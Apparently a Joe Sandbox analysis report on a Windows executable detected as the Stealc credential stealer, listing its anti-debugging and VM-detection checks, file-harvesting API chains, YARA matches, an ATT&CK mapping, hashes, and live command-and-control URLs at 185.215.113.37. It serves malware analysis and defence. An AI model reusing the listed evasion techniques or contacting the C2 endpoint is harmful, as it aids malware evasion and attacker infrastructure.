                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3CD4 second address: 12A3CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3CDA second address: 12A3CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3CDE second address: 12A3CE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2FB9 second address: 12A2FE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9155h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F7ADCEF9148h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2FE0 second address: 12A2FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3191 second address: 12A3197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3197 second address: 12A31D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F7ADCB968C6h 0x00000014 jl 00007F7ADCB968C6h 0x0000001a jmp 00007F7ADCB968CEh 0x0000001f jno 00007F7ADCB968C6h 0x00000025 popad 0x00000026 pushad 0x00000027 jng 00007F7ADCB968C6h 0x0000002d push edx 0x0000002e pop edx 0x0000002f pushad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A31D9 second address: 12A31DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3491 second address: 12A3497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A39CE second address: 12A39D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A39D2 second address: 12A39E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A69E9 second address: 12A69ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A69ED second address: 12A69F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6A8A second address: 12A6A94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7ADCEF9146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8066 second address: 12A806A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A806A second address: 12A8070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8070 second address: 12A8076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8076 second address: 12A808B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A808B second address: 12A8095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7ADCB968C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8095 second address: 12A80B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7ADCEF914Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 jc 00007F7ADCEF9146h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A80B7 second address: 12A80C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F7ADCB968C6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51602C5 second address: 51602E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 pushad 0x0000000a push esi 0x0000000b mov bx, 2A20h 0x0000000f pop edx 0x00000010 mov dx, cx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, 5B50h 0x0000001d mov si, dx 0x00000020 popad 0x00000021 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1021BAE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11E75BF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11C741A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 124A497 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DD38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DD4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DCDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DCE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DD4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DCED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DCF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DD3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DCBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DCDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC1160 GetSystemInfo,ExitProcess,0_2_00DC1160
                Source: file.exe, file.exe, 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1747910507.0000000001690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK^
                Source: file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware~#m
                Source: file.exe, 00000000.00000002.1747910507.0000000001690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13585
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13588
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13605
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13640
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13600
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC45C0 VirtualProtect ?,00000004,00000100,000000000_2_00DC45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DD9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD9750 mov eax, dword ptr fs:[00000030h]0_2_00DD9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00DD78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7348, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00DD9600
                Source: file.exe, file.exe, 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00DD7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00DD7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00DD7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00DD7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.dc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.dc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php2file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/tfile.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php/file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php_file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/(file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37efile.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/wsfile.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpSfile.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1541350
                              Start date and time:2024-10-24 18:07:04 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 11s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:1
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 87
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947492864720479
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'821'696 bytes
                              MD5:20a21ec73989a782b2b0243f0ed123ba
                              SHA1:e81022b1710d56722b6f61b61c7d4a798d9dcbba
                              SHA256:8313f9dad601a181e4ec94751f43c08ae280504db80c68fbb6ff86e26902d38b
                              SHA512:ec49719a1298ed09e256e94dc6b08033aea72630b8fd692a77a6551bbacb5ece8733f01c5972146eacb70c020ff46493ecbe4b895935d3b5b41c14861c18984b
                              SSDEEP:49152:h+n/JIP2boz0A4dQyXf2xoC4HJs3lePpHLV:h+n/JI+Ez0dTOx6a1eBr
                              TLSH:D085336821EF4576F283A1F1AD11B358CBFE4222C96511956C5F2E2E04A33FE33417BA
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0xa8d000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F7ADCDDFC9Ah
                              rsm
                              sbb eax, dword ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F7ADCDE1C95h
                              add byte ptr [edi], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              pop es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
